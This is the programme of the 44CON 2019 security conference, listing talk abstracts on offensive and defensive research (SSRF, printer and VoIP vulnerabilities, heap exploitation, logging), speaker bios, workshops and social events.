44CON 2019: Full Schedule

18:00 BST

Registration opens

44CON 2019 opens with the Community Evening. Free to attend (registration required)

Wednesday September 11, 2019 18:00 - 18:29 BST
Registration

Networking

18:30 BST

44CON 2019 Community Evening Opening

Speakers

Steve

Wednesday September 11, 2019 18:30 - 18:44 BST
* Track 1 *

Track 1 Talk

18:45 BST

Owning The Cloud Through SSRF

With how many apps are running in the cloud, hacking these instances becomes easier with a simple vulnerability due to unsanitized user input. In this talk, we’ll discuss a number of different methods that helped us exfil data from different applications using Server-Side Request Forgery (SSRF). Using these methods, we were able to hack some of the major transportation, hospitality, and social media companies and make $50,000 in rewards in 3 months.

Speakers

Cody Brocious

Wednesday September 11, 2019 18:45 - 19:15 BST
Village Hall

18:45 BST

Daniel Romero & Mario Rivas - Mundane office equipment: The front door to persistence on enterprise networks

The security of common enterprise infrastructure devices such as desktops and laptops has advanced over the years through incremental improvements in operating system and endpoint security. However, security controls for network devices such as enterprise printers are often ignored and thus present a greater potential for exploitation and compromise by threat actors seeking to gain a persistent foothold on target organisations.

In order to assess the current state of mainstream enterprise printer product security and to challenge common assumptions made about the security of these devices, which sit on key parts of enterprise networks and process sensitive data, we set out on a vulnerability and exploitation research project of six known vendors. We were able to find remote vulnerabilities in all printers tested through various attack vectors, revealing a large number of 0-day vulnerabilities in the process.

In this talk we walk through the entire research engagement, from initial phases such as threat modelling to understand printer attack surfaces to the development of attack methodologies and fuzzing tools used to target printer-specific protocols and functions. Besides of remarking important vulnerabilities found and their respective CVE’s, proof of concept exploits showing how it is possible to gain full control of printers and all of the data they manage will be presented. This will show how to use enterprise printers as a method of persistence on a network, perhaps to exfiltrate sensitive data or support C2 persistence on Red Team engagements.

We also address a number of challenges that researchers can face when performing vulnerability research on devices such as printers and how we used different techniques to overcome these challenges, working with limited to no debugging and triage capabilities. We also present mitigations that printer manufacturers can implement in order to reduce printer attack surfaces and render exploitation more difficult.

Speakers

Daniel Romero

Managing Security Consultant, NCC Group

Daniel is currently a security consultant and researcher at NCC Group. During his career he has worked in interesting security projects, always trying to “break” as much as possible. In the last years Daniel has mostly been focused on embedded devices / IoT and all what surrounds... Read More →

Mario Rivas

Senior Security Consultant, NCC Group

Mario is a penetration tester and security consultant at NCC Group in Madrid. His interests revolve around all areas of computer security, always trying to learn new things, and specially enjoying writing tools during the process to make his life a bit easier.

Wednesday September 11, 2019 18:45 - 19:44 BST
* Track 1 *

Track 1 Talk

18:45 BST

Chrissy Morgan - RFID Hacking Tools Workshop

A 101 & upwards workshop on Radio Frequency Identification, tools, and how to make your own access control system.
If you’re new to Arduino, RFID or basic electronics, this is the workshop for you!

To start of an intro into RFID theory and how this is practically applied with the use of tools on the market such as Proxmark RDV 4.

We will be covering some basics of electronics, and with breadboards, teach you how to put your own circuit together, this will come in handy when we use these basics to help you build your own MFRC522 reader setup.
We will explore the Arduino MFRC522 library, working our way through the scripts and learn how they can be adapted and built upon to bring everything together building your very own access control system.

Speakers

Chrissy Morgan

Chrissy heads up the IT Security Operations for a Close Protection (Bodyguard) company by day and is a Security Researcher by night. As an advocate of practical learning, Chrissy also takes part in bug bounty programs and has found bugs in platforms such as Microsoft and Whois.com... Read More →

Wednesday September 11, 2019 18:45 - 20:44 BST
* Workshop *

Workshop

19:15 BST

Continuous Integration / Continuous Bounties: Attacking development pipelines for actual profit

CI/CD pipelines are the perfect, bug-rich target for new and experienced bug hunters. As complex, user-controlled automated processes with access to authentication secrets, source code, and application servers in multi-system, multi-user environments, they combine all the things that make bugs likely. In the presentation, I will outline a methodology for hunting for bugs in CI/CD pipelines and walk through actual bugs which have resulted in tens of thousands of dollars in bounty payments.

Speakers

Alex Chapman

Wednesday September 11, 2019 19:15 - 19:45 BST
Village Hall

19:45 BST

Chris Wade - Making something out of something

This talk relates to software and hardware modification of existing consumer electronics in order to give them features that could be relevant in a security context. It mainly focuses on techniques for identifying the potential for a device to be modified, and techniques for doing so, with a large number of varying demos to back it up.

The first device modification will be the NX301 handheld ODB-II reader. This device in particular was chosen due to its locked chip, encrypted firmware updates and the board’s capabilities, in particular the STM32 MCU, which could be used for connection to various peripherals. The talk will then outline the current features, and the features that could be potentially added to it. The most key of these will be discussing how, due to the STM32 chip used on the board, it would be possible to turn this device into a handheld USB rubber ducky, with an LCD screen menu and interface. This will then discuss how the device was selected for reverse engineering among a large number of potential devices.

The talk will then move onto another device, the WS-6933 satlink detector. This device was found to have a similar Microcontroller to the previous device, however it has some limitations which meant that it could not be used for the same purpose, but could be used for its own. Various modification techniques will be discussed in depth.

These techniques will be performed on a third device, a 2.4GHz RF modular used by radio controlled planes. This device was briefly touched upon in my talk last year “Pwning the 44CON Nerf Tank”, but in this instance will be used in order to show how USB access can be provided to all four radio chipsets on the device, providing a powerful interface for interacting with their specific protocols. This will cover more details of debugging in environments where it is not always possible. This will be briefly touched upon as similar work has been covered in other talks, but can demonstrate useful techniques.

A children’s toy will then be demonstrated with custom firmware to perform different functions to what was intended. This will outline the disassembly and analysis of the device, and point out how large amounts of the technology involved in creating a smart children’s toy are the same as in a more serious piece of equipment, and also outline the same vulnerabilities. This section of the talk will largely be for entertainment value, but will show how anything can be converted into a useful device with a sufficient amount of knowledge and effort.

The last demo will be of what can be done when hardware changes are made to devices. We will demonstrate how, by adding a few additional components and a tuned coil to the back of the OBD-II reader, the device can be modified in order to perform the functions of an NFC device, specifically a Mifare Classic NFC tag, with all of the features necessary to emulate and exploit the device. This will show how desirable modifications can be made to the hardware on the device in order to increase it’s capabilities, and demos with some NFC exploits will accompany this.

Speakers

Chris Wade

Pen Test Partners

Chris is a seasoned security researcher and consultant. His main focuses are in reverse engineering hardware, fingerprinting USB vulnerabilities and playing with Software Defined Radios, with his key strength lying in firmware analysis, which he utilises as part of the hardware testing... Read More →

Wednesday September 11, 2019 19:45 - 20:44 BST
* Track 1 *

Track 1 Talk

19:45 BST

Blade Runner Final Cut

Wednesday September 11, 2019 19:45 - 21:59 BST
Village Hall

Movie

08:00 BST

Morning Yoga Session

Thursday September 12, 2019 08:00 - 08:44 BST
Village Pub

Mental Health

08:00 BST

Registration opens

Thursday September 12, 2019 08:00 - 09:30 BST
Registration

Networking

09:15 BST

44CON 2019 Opening

Speakers

adrian

Steve

Thursday September 12, 2019 09:15 - 09:29 BST
* Track 1 *

Track 1 Talk

09:30 BST

Katharina Sommer - Outsourcing global cyber norms?

Traditional mechanisms of international rule-making have failed to drive forward globally accepted norms of responsible behaviour in cyberspace. The private-sector led initiatives that have sprung up in their place thus far fail to consider how threats to state powers and control will be contained. The only way to break that current impasse is by way of new ways of working.

The presentation will make the case for a model of multilateral collaboration, de facto outsourcing responsibility for international cyber norms development to a differently incentivised private sector while ensuring states maintain responsibility for norms enforcement.

It will test the assumption that a model of this kind has not yet been successfully applied, assessing three recent cyber norms initiatives – Cybersecurity Tech Accord; Charter of Trust; Paris Call for Trust and Security in Cyberspace – against five factors before drawing practically focused conclusions, looking at the success factors for adoption of the proposed multilateral collaboration model, and setting out how business and government practices would have to change.

Speakers

Katharina Sommer

Head of Public Affairs, NCC Group

Seeking to act as an interpreter between technical and policy communities, Kat leads the Group’s political engagement, government relations and lobbying work, educating policy-makers on cyber security and internal audiences on political developments and priorities, and shaping the... Read More →

Thursday September 12, 2019 09:30 - 10:29 BST
* Track 1 *

Track 1 Talk

09:30 BST

Nicolas Joly - Hunting for bugs, catching dragons

While browser and plugin exploits are frequent, it’s less common to see exploits affecting targets without scripting capabilities. Are these worth attacking? How do we proceed? How do we identify valid entry points and bugs? This talk will cover some research done at Microsoft on Outlook and Exchange and discuss the results. Scary dragons will be spotted in this tour, hopefully you’ll catch some too.

Speakers

Nicolas Joly

Nicolas Joly is a security engineer at the MSRC in Cheltenham. He has more than 10 years of experience at reverse engineering and vulnerability discovery, and is now focused on finding and exploiting bugs at Microsoft. Prior to this, he used to hunt bugs for bounties and won several... Read More →

Thursday September 12, 2019 09:30 - 10:29 BST
* Track 2 *

Track 2 Talk

09:30 BST

Careers Morning

A coffee morning with careers advice and a small panel.

9:30-10:00 - A chance to informally chat over coffee and to informally gather questions for the panel session
10:00 -10:30 - Panel Q&A use the sli.do app to submit questions anonymously (event number 5085)
10:20-11:00 - More coffee, informal chats and close.

Speakers

Leigh-Anne Galloway

Sam Verity

Saumil Shah

Saif El-Sherei

Thursday September 12, 2019 09:30 - 11:00 BST
Village Pub

10:30 BST

Break

Thursday September 12, 2019 10:30 - 10:59 BST
Main Hall

Networking

10:30 BST

NCSC and Duncan Atkin - Logging Made Easy Workshop

Logging Made Easy (LME) is a tried and tested self-install tutorial for small organisations to gain a basic level of centralised security logging for Windows clients and provide functionality to detect attacks. LME is designed to be a quick to deploy logging solution giving you access to useful logs when you need them. Lead by NCSC, Developed in collaboration with NCC Group and with funding from the Cabinet Office, LME provides an organisation with a simple to deploy, simple to maintain and simple to use logging solution. LME allows for users with both limited knowledge and the with advanced knowledge to perform performance, Incident response and threat hunting activity. LME gathers logs to provide this capability both from the built in windows event logging and that provided by Microsoft Sysmon.

This log data can be leveraged to search for to name but a few, Files hashes, File Names, nefarious launches such as Microsoft win word launching Microsoft Powershell which then launches IE to download and execute VBS. On the other end of the attack spectrum LME allows you to see what applications are crashing on your estate and other performance related logs, Allowing you to be one step ahead of some potential problems.

We will run through this tutorial and then provide you with an environment to give it a go yourself (with a bit of magic for the Windows slow bits)

A hands on look into the logging made easy solution from set-up, roll-out, testing and example uses. This workshop will aim to show attendees how to deploy and use LME over a provided test network. Featuring hands on practicals and scenarios to test out functionality in LME and get a grasp on how this data can be leveraged to achieve greater visibility into actions occurring on your hosts across your estate.

Speakers

NCSC Representatives

NCSC Representatives are not permitted to submit bios, and while funny to make one up, it would be cruel for us to do so, so we’re leaving this blank.

Duncan Atkin

NCC Group

Duncan is a fully certified lumberjack, capable of processing massive volumes of logs. When not processing logs, he enjoys growing trees and making cider with the fruits of his labour. (Duncan did not submit a bio)

Thursday September 12, 2019 10:30 - 12:29 BST
* Workshop *

Workshop

11:00 BST

The CISO's Dilemma

Defending an enterprise is a balancing act. I have worked as an offensive testing vendor to several global organisations over 18 years. This talk explores the challenges that today’s CISOs face - the threat landscape, overall shortage of infosec expertise, the ever evaporating shelf life of infosec products and an increased burden of compliance requirements. I will share my experiences from working with highly effective CISOs and internal infosec teams and what it takes to function on the razor’s edge

Speakers

Saumil Shah

Thursday September 12, 2019 11:00 - 11:59 BST
* Track 1 *

Track 1 Talk

11:00 BST

Marcello Salvati - BYOI (Bring Your Own Interpreter) payloads: Fusing the powah of .NET with a scripting language of your choosing

Offensive PowerShell tradecraft is in “Zombie Mode”: it’s sorta dead, but not entirely. With all of the defenses Microsoft has implemented in the PowerShell runtime over the past few years Red Teamers / Pentesters & APT groups have started too shy away from using PowerShell based payloads/delivery mechanisms and migrate over to C#. However, C# is a compiled language, operationally this has a few major downsides: we can’t be as “flexible”, setting up a proper development environment has overhead and can be time consuming, you have to compile all the things all the time etc.. Bottom line is I’m lazy and creating your malwarez/custom payloads in C# is not as easy & straight forward as it would be in PowerShell or really any scripting language.

This raises the following quandary: can we somehow get our own scripting language interpreter on the target machine while still remaining opsec safe and use it to perform all of our post-exploitation activities?

Turns out by harnessing the sheer craziness of the .NET framework, you can embed entire interpreters inside of .NET languages allowing you to natively execute scripts written in third-party languages (like Python) on windows! Not only does this allow you to dynamically access all of the .NET API from a scripting language of your choosing, but it also allows you to still remain completely in memory and has a number of advantages over traditional C# payloads! Essentially, BYOI payloads allow you to have all the “power” of PowerShell, without going through PowerShell in anyway!

In this talk we will be covering some key .NET framework concepts in order to understand why this is possible, how to actually do the interpreter/engine/runtime embedding, the concept (that I coined) “engine inception”, differences between traditional C# payloads & BYOI payloads, demoing some examples of BYOI payloads and finally SILENTTRINITY: an open-source C2 framework that I’ve written that attempts to weaponize some of the BYOI concepts.

Speakers

Marcello Salvati

BlackHills Information Security

“Marcello Salvati (@byt3bl33d3r) is a Security Analyst at BlackHills Information Security by day and by night a tool developer who discovered a novel technique to turn tea, sushi, alcohol and dank memes into somewhat functioning code. His passions include anything Active Directory... Read More →

Thursday September 12, 2019 11:00 - 11:59 BST
* Track 2 *

Track 2 Talk

11:00 BST

Breaking Badge - Tim Wilkes and Phyushin

Thursday September 12, 2019 11:00 - 11:59 BST
Village Hall

Workshop

12:00 BST

Lunch

Thursday September 12, 2019 12:00 - 13:29 BST
1st Floor Restaurant

1st Floor Restaurant

13:30 BST

Here be dragons… the AWS S3 logging minefields

Cloud based services have become the norm. Your services are in the cloud, your data is in the cloud, your logs are in the cloud. What are the new challenges and concerns with this approach?
In this talk, SpectX will share its data-driven research into the reliability and trustworthiness of S3 server access logs. How does S3 server access logging work? How does Amazon’s best-effort log delivery look like in practice? When and how should you analyse the logs? What should you ask? Can you trust the results? If not – what’s the workaround?

Speakers

Kieren Nicolas Lovell

SpectX

Thursday September 12, 2019 13:30 - 14:00 BST
Village Hall

13:30 BST

Guy Barnhart-Magen - Security Research Teams - How to manage, grow and retain them

Security research teams are one of the important partners in any security organization and are usually found through an external company or through an internal group. Such teams are needed to secure your products, your network, and your business resources.

Managing and measuring such intangibles as “Security research” is a difficult problem, mainly revolving around the need to discover and fix issues before they reach the field and cause actual harm. Measuring or defining KPI for such teams is problematic as research has no firm boundaries or guarantees.

Access to such talent is crucial in today’s world and many companies are looking into hiring and growing such internal teams. Hiring security research talent, retaining and helping them to provide high business ROI is very difficult.

Over my career, I helped build and grow security research teams in large corporates and in start-up environments, and I will share some of my experience and advice for managing such teams.

In this talk, I will cover some basic lay of the land, some KPI that can be used to measure success and advice on how to retain and guide such teams.

Speakers

Guy Barnhart-Magen

BSidesTLV chairman and CTF lead, Public speaker, and recipient of the Cisco “black belt” security ninja honor – Cisco’s highest cyber security advocate rank With nearly 20 years of experience in the cyber-security industry, Guy held various positions in both corporates and... Read More →

Thursday September 12, 2019 13:30 - 14:29 BST
* Track 1 *

Track 1 Talk

13:30 BST

Phillip Roskosch & Stephan Huber - Dial V for Vulnerable: Attacking VoIP Phones

More and more everyday objects become “smart” and get connected to the internet. VoIP phones are among the oldest class of smart devices. Despite new phones being constantly released, most of these devices contain cheap hardware components and badly programmed software. Their state of security is often questionable, or worse. We show that most phones suffer from serious security flaws that allow attackers to gain full control of these devices. Such hijacked devices not only allow the attacker to eavesdrop on all communication, but can serve as an entry point for further attacks to the internal networks they are connected to.

VoIP phones can be found on each enterprise desk, in critical infrastructure buildings, at home and other places where phone communication is required. Therefore, security flaws on such a device can have far-reaching consequences, especially when transmitting sensitive or private information. We present critical vulnerabilities and various classes of security flaws that allow an attacker to fully compromise the respective device. We were able to cause a denial of service, to eavesdrop on conversations, and to gain remote code execution on the phone.

In our investigation, we focused on the web-based user interface that most phones provide for configuration and management purposes. We present different test setups for analyzing the software running on those phones, including emulation and live debugging. Furthermore, we reveal strategies and tools for finding these flaws.

To complete the presentation, we compare our manually detected vulnerabilities to results of different automated firmware security analysis systems. As we show, automated scanners are unable to find most of these vulnerabilities and leave systems widely unprotected.

Speakers

Phillip Roskosch

Philipp is a security researcher of the department Secure Software Engineering at Fraunhofer SIT (Germany). His research interests center on static and dynamic security analysis in the area of mobile apps and IoT devices. Besides research, he is a penetration tester in the same field... Read More →

Stephan Huber

Stephan is a security researcher at the Testlab mobile security group at the Fraunhofer Institute for Secure Information Technology (SIT). His main focus is Android application security testing and developing new static and dynamic analysis techniques for app security evaluation... Read More →

Thursday September 12, 2019 13:30 - 14:29 BST
* Track 2 *

Track 2 Talk

13:30 BST

Max Kamper - Introduction to GLIBC heap exploitation

A 2-hour workshop introducing folks to the basics of GLIBC heap exploitation, covering two publicly known but oft-misunderstood GLIBC heap exploit methods. VMs will be provided with the workshop, and the “House of force” and “fastbin dup” techniques will be covered in depth.

Students will learn two heap exploitation techniques whilst writing exploits against two vulnerable binaries. It is aimed at those will little to no GLIBC heap experience. A lot of people who CTF are keen on learning about heap exploitation since there are always heap-based challenges and each year new techniques are brought to light. What stops them from learning these techniques is the misconception that heap exploits are prohibitively difficult to write, my workshop is there to dispel this myth and provide a starting point for those who wish to start learning new exploit development techniques.

Speakers

Max Kamper

Applied Intelligence Laboratories

An ex-Royal Marines Commando turned cyber-security enthusiast. Max cut his teeth on electronic warfare operations and now works as a researcher for Applied Intelligence Laboratories. Author of the “ROP Emporium”, he spends his time compiling the GNU C library and wondering how... Read More →

Thursday September 12, 2019 13:30 - 15:29 BST
* Workshop *

Workshop

14:00 BST

From fuzzing to free reign - Finding zero days with Tenable Research

Over the last 18 months Tenable Research have been hitting the headlines with major vulnerabilities they've discovered in household names and critical devices. Some read like a Hollywood script, enabling an attacker to break into an office undetected, others highlighting huge flaws in critical infrastructure. Join Leslie Forbes from Tenable, as he explores the more notable disclosures, how they were found and the impact they have to us all.

Speakers

Leslie Forbes

Tenable

Thursday September 12, 2019 14:00 - 14:30 BST
Village Hall

14:30 BST

Kashish Mittal - One Person Army - Playbook on how to be the first Security Engineer at a company

How often have you heard that ‘Early stage startups don’t care much about Security because if there is no product, there is nothing to secure?’ Although there is merit in the argument that startups need to build product so as to sustain and grow, it often puts the person in charge of securing them in a tricky position. For most startups, this person is the first Security Engineer who can be somewhere between the 10th to 300th employee. By the time the first Security Engineer is on-boarded the attack surface has usually become quite large and he or she faces an uphill battle to go about securing the organization. In such cases, the Security Engineer needs to perform as a ‘one-man army’ keeping the attackers at bay. In this talk, i will present a playbook on how to perform as one.

In this presentation, i will talk about the Startup Security methodology which has served me very well in starting, building and growing Security teams at various startups. The focus and goals include :-

DevSecOps – You are in-charge of everything
Automation is your friend – Alerts significantly better than watching or monitoring a tool
Secure, Document, Repeat!
Developer empathy – It is new for them
Build vs Buy – Maximizing ROI in terms of money and time
Security Education and Awareness
IPad signing technique – Risk consumption and buy-in
Alignment with upper management before you accept the job – Budget, Headcount, Goals, Timeline etc.

I will also recount war stories from experiences including mine from when I was the first AppSec Engineer at Duo Security (acquired by Cisco), was founding engineer at Elevate Security and started the Security team at MileIQ (acquired by Microsoft) and those of my colleagues who have been in similar shoes.

Speakers

Kashish Mittal

MileIQ

Kashish Mittal is a Security Researcher and Engineer. He currently is the Head of Security at MileIQ, a Microsoft startup. He has worked for companies such as Elevate Security, Duo Security, Bank of America, Deutsche Bank etc. By choice, he is an ethical hacker and an addicted CTF... Read More →

Thursday September 12, 2019 14:30 - 15:29 BST
* Track 1 *

Track 1 Talk

14:30 BST

Neil Kettle - IBM/Trusteer Rapport: Does IBM (I)ntentionally (B)ackdoor (M)achines?

Despite my best efforts in 2011, IBM/Trusteeer Rapport is still doing the rounds in the UK banking community. Having concentrated on what was at that time OS-X related issues with only hints at the Windows issues, no one seemed to pick up the mantle to prove the remainder of Trusteer Rapport nothing more than snake oil. In the intervening years Trusteer have been hard at work improving their backdoors after their acquisition by IBM for a cool $1 billion in September 2013, quite the price to pay indeed. In this talk I’ll cover the historical state of, what was, the MacOS implementation since a recent disclosure resulted in IBM/Trusteer fixing the issues by performing a simple ‘rm -rf’ of the Kernel components (CVE-2018-1985) and the current state of play for the Windows components, the result of which is hopefully the ‘rm -rf’ of the Windows components.

Speakers

Neil Kettle

Digit Labs

Neil was testing various writing products when he found a pair of special sunglasses. Wearing them, he saw the world as it really is: people being bombarded by media and government with messages like “Stay Asleep”, “No Imagination”, “Nobody got fired for buying IBM”. Even... Read More →

Thursday September 12, 2019 14:30 - 15:29 BST
* Track 2 *

Track 2 Talk

14:30 BST

Scout Suite – A Multi-Cloud Security Auditing Tool

Scout Suite (https://github.com/nccgroup/ScoutSuite) is an open source multi-cloud security-auditing tool, which enables security posture assessment of cloud environments. Using the APIs exposed by cloud providers, Scout Suite gathers configuration data for manual inspection and highlights risk areas. Rather than going through dozens of pages on the web consoles, Scout Suite presents a clear view of the attack surface automatically.
The following cloud providers are currently supported:

Amazon Web Services
Microsoft Azure
Google Cloud Platform
Oracle Cloud Infrastructure
Alibaba Cloud

During the presentation, we will run Scout Suite against a number of cloud environments preconfigured with typical flaws. We will display how Scout Suite can be used to identify and help with remediation of security misconfigurations.

Speakers

Xavier Garceau-Aranda

NCC Group

Thursday September 12, 2019 14:30 - 15:30 BST
Village Hall

15:30 BST

Matt Wixey - “I’m unique, just like you: Human side-channels and their implications for security and privacy”

Almost everything about us – our handwriting, DNA, faces, voices, fingerprints, even our eyes – can be used to distinguish us from the seven billion other people on the planet. These physical identifiers can allow law enforcement to trace back real-world crimes to offenders, and enable biometric authentication mechanisms. However, such identifiers are often irrelevant when it comes to attempting to track or disrupt threat actors.

In this talk, I will discuss, explore, and explain identifiers which are unintentional, non-physical, and generated as a result of human behaviours and activities, but which can still be used to uniquely identify and/or track individual users in the digital realm. I call these identifiers “human side-channels”, and will explore how they work; how they can be used for both attack and defence; and how they can be countered.

I’ll examine three human side-channels in particular: forensic linguistics; behavioural signatures; and cultural references. I will start by exploring the theories underpinning these side-channels, which are rooted in personality psychology and the concepts of consistency and distinctiveness as a result of our unique experiences, training, and feedback. I’ll then explore how they work; walk through case studies and examples/demos of using them practically in security contexts; and discuss how they could be practically applied to investigate and track threat actors, in situations ranging from hostile social media profiles to post-compromise exfiltration and privilege escalation.

I’ll also examine the privacy implications of each technique, and how such characteristics – which are much harder to recognise, obfuscate, or spoof – could be used to erode privacy. I’ll go into detail regarding possible countermeasures to disguise your own human side-channels, and I’ll wrap up by outlining some ideas for future research in these areas.

Speakers

Matt Wixey

PWC

Matt is the Research Lead for the PwC Cyber Security practice in the UK, and is a PhD candidate at University College London. Prior to joining PwC, Matt led a technical R&D team for a law enforcement agency in the UK. His research interests include antivirus and sandboxing technologies... Read More →

Thursday September 12, 2019 15:30 - 16:29 BST
* Track 1 *

Track 1 Talk

15:30 BST

Matt Summers - 4G to 5G - Cellular Security Myths and the Reality (not filmed)

To date cellular technology has been about delivering a small number of services to end users. The advent of 5G will introduce not only new end user services but consist of a number of new paradigms that mobile operators will have to implement. With the reduction in cost of software defined radios and freely available mobile technology stacks the barrier to entry into mobile technology hacking has never been lower. That said, there are still a number of myths and misconceptions with regards to mobile security and this will only get worse an additional end user services are released.

During this presentation we will walk through a number of key topics including 4G security, IMSI catchers, 5G services 5G security and the adversaries that an end user can face.

Please note, this talk will not be filmed.

Thursday September 12, 2019 15:30 - 16:29 BST
* Track 2 *

Track 2 Talk

16:15 BST

Gin o'clock

Thursday September 12, 2019 16:15 - 16:59 BST
Main Hall

Networking

17:00 BST

Pizza with Detectify

Thursday September 12, 2019 17:00 - 19:00 BST
Main Hall

19:00 BST

Many Hats Club Intro

Thursday September 12, 2019 19:00 - 19:30 BST
Village Pub

Networking

19:30 BST

Johanna Ydergård - How to have a broader impact as an ethical hacker

1st Many Hats Club Talk

Speakers

Johanna Ydergård

Thursday September 12, 2019 19:30 - 20:15 BST
* Track 1 *

20:00 BST

Blade Runner 2049

Thursday September 12, 2019 20:00 - 22:29 BST
Village Hall

Movie

20:30 BST

Live Many Hats Club Podcast Session

Thursday September 12, 2019 20:30 - 21:30 BST
* Track 1 *

20:30 BST

Pub Quiz

Many Hats Pub Quiz

Thursday September 12, 2019 20:30 - 21:30 BST
Village Pub

21:45 BST

Scammerz Live Scambaiting hosted by Stu [NSFW]

Live scam baiting, anyone can join in.

Thursday September 12, 2019 21:45 - 22:30 BST
Village Pub

21:45 BST

Slide Roulette

Thursday September 12, 2019 21:45 - 22:30 BST
* Track 1 *

08:00 BST

Doors open for Day 2

Friday September 13, 2019 08:00 - 09:19 BST
Registration

Networking

09:20 BST

44CON 2019 Day 2 Opening

Speakers

adrian

Steve

Friday September 13, 2019 09:20 - 09:29 BST
* Track 1 *

Track 1 Talk

09:30 BST

Klaus Schmeh - Cold War Cryptography

The use of cryptography during the Cold War is a fascinating, yet still little researched topic. Though most is still classified, a considerable amount of information about Cold War encryption has become public over the last two decades. The purpose of this talk is to tell the five or six most stunning crypto stories from the Cold War era in an entertaining, yet informative way. Like always, the speaker will use Lego models, self-drawn cartoons and similar means to support his speech.

Speakers

Klaus Schmeh

Klaus Schmeh has published 16 books, 200 articles, 1,000 blog posts and 25 research papers about encryption technology, which makes him the most-published cryptology author in the world. While he writes his blog in English, most other of his publications are in German. Klaus Schmeh... Read More →

Friday September 13, 2019 09:30 - 10:29 BST
* Track 1 *

Track 1 Talk

09:30 BST

Rebalance Every 10,000 Kilometers

Careers are long. Jobs are short. One day, things are going well and in balance. The next day, there’s twenty hours of work to do. Pull back some and it is more of the same. The first half of the year, things were great. Then change came and chaos reigned and burn out followed. Pull back even further, and the demands of work and life over decades comes into sharp relief. This session presents strategies to maintain your mental health over the long haul. Handle imposter syndrome and stress. Know when to stick it out but recognize the signs when it is just not worth it. Fail and recover gracefully. Pulling on personal lessons and anecdotes from mentoring others, the presentation provides a career user manual.

Speakers

J. Wolfgang Goerlich

Advisory CISO, Duo Security

J Wolfgang Goerlich supports information security initiatives for clients in the healthcare, education, financial services, and energy verticals. In his current role with CBI, a cyber security consultancy firm, Wolfgang is the senior vice president for strategic security programs... Read More →

Friday September 13, 2019 09:30 - 10:29 BST
* Track 2 *

Track 2 Talk

09:30 BST

Ian Tabor - Car Hacking Village - CAN bus basics with hands on fuzzing

The ‘Car Hacking Village’ has PD0 a ‘CAR in a box’ which is most of the ECU components from a Peugeot 208. This is configured so that all the main dials on the vehicle work, Speedo, rev counter, fuel gauge and temp gauge. This will allow attendees if they get through the fuzzing part access to a complete vehicle to hack.

The workshop will consist of a short presentation on the history of CAN bus, the physical layer, the speeds, data format, message id’s. The attendees will then have access to sets of instrument cluster (hopefully 10-12 sets) to fuzz to try to work out which messages cause which parts of the cluster to work. Each cluster set will include a can bus adapter that can be used for the fuzzing.

Speakers

Ian Tabor

Network / security architect that has a passion for car hacking, found vulnerabilities in his own car and also private Car bug bounties. Now runs Car Hacking Village UK and is part of the team behind CHV at defcon

Friday September 13, 2019 09:30 - 11:59 BST
* Workshop *

Workshop

09:30 BST

Matt Lorentzen - Automating user interaction with Sheepl: Soup to Nuts

Sheepl is a tool designed to emulate user behaviour and has matured into a platform for supporting tradecraft development for both red and blue teams. The tool was born out of a personal need for ‘sparring’ partners without the predictability of knowing when things are going to happen.

Using a representative network I plan to give participants hands on experience of creating Sheepl that can be used to attack, execute commands and emulate real world user actions such as browsing, opening emails, interacting with command environments and creating content.

The environment will also have a monitoring solution deployed that can be used to trace commands that will be executed from the ATT&CK framework. The workshop will also cover creating Sheepl that respond to events on a system and the example used will be to create Sheepl that watch for supplied process names and kill these automatically after a period of time. This is good for operational security considerations when looking at Red Team tradecraft development and for CTF style events.

I will also show the process of creating custom tasks to extend Sheepl capabilities and how sequences of tasks can be saved as JSON profiles. The goal is that by the end of the workshop, participants will have a solid understanding of the planning and workflow for creating Sheepl that support specific learning objectives as well as generating more realistic end user behaviour within training environments.

Speakers

Matt Lorentzen

Matt has 20 years IT industry experience working within government, military, finance, education and commercial sectors. He is a senior security consultant and penetration tester at SpiderLabs with a focus on red team engagements. Before joining SpiderLabs, he worked with Hewlett... Read More →

Friday September 13, 2019 09:30 - 11:59 BST
Village Hall

Workshop

10:30 BST

Break

Friday September 13, 2019 10:30 - 10:59 BST
Main Hall

Networking

11:00 BST

Jordan Santarsieri - Spyware, Ransomware and Worms. How to prevent the next SAP tragedy

Is not a secret that SAP is a market leader and one of the principal software providers of the core business applications around the world, nearly 95% of the Fortune-500 companies heavy rely on SAP to perform their most critical and daily operations such as processing payroll, benefits, storing sensitive customers’ information, handling credit cards, logistics and many more.

Due to the “ERP Complexity of the simple things” and in combination with several proprietary protocols, entry-points and default misconfigurations, ERPs are particularly vulnerable to Spyware, Ransomware and Worms, making them the ideal targets for this type of attacks due to the economic significance that these systems hold.

Join me on this completely new and highly technical talk, in which I’m going to explain through several live demos how the different types of malware could impact SAP and what actions you could take to prevent the next SAP tragedy.

As an added value, we will reveal for the first time, our very own project “ARSAP”, a semi-automatic mechanism that detects and register all the SAP systems that are exposed to the Internet, extracting the system’s metadata and cataloging the assets in base of their Geo-location, system type, version, installed components, etc.

Speakers

Jordan Santarsieri

Vickxer

Mr Santarsieri is a founder partner at Vicxer where he utilizes his 12+ years of experience in the security industry, to bring top notch research into the ERP (SAP / Oracle) world. He is engaged in a daily effort to identify, analyze, exploit and mitigate vulnerabilities affecting... Read More →

Friday September 13, 2019 11:00 - 11:59 BST
* Track 1 *

Track 1 Talk

11:00 BST

Tony Gee & Vangelis Stykas - The billion dollar IoT attack no one knows about

What would you do if you knew you could exploit 20 million plus IoT devices? Denial of service? Old hat. Power grid manipulation? Boring! What about making a billion dollars? Many IoT tracking devices now use cellular data networks to communicate with servers allowing owners to track and interact in near real time with their devices. Which is great, but is that opening another avenue for attack?

Sometimes it feels we are going backwards in IoT security, along with the obvious wireless attacks, the rooting of the latest must have sex toy and the very public exposure of undocumented services on Shodan, we have seen countless compromises being performed by simple logic flaws. Insecure Direct Object References (IDOR) is commonly used in attacks that look to compromise the web service to take over the end user account. It is most often found in the rush to deliver new devices, usually from the companies playing catch up with their outsourced development team. These logic flaws allow the attacker to perform functions as the user, such as remotely unlocking, starting and stealing your car or tracking your kids in real time. Great, so money made, move on right? Well, there are many problems with stealing a car or kidnapping a child for ransom, not least you might easily get arrested and moving stolen goods especially high value stolen goods is harder than you think and let’s be honest a kidnapping and ransom is not a good look for anyone. But are we missing a trick?

In this talk we will look at connected tracking devices and show examples of how simple logic flaws are being repeated time and time again across multiple devices. We will show how manufacturers and developers are white labelling vulnerable APIs for and selling them on to multiple tracking device companies magnifying the issue millions of times to unsuspecting victims around the world.

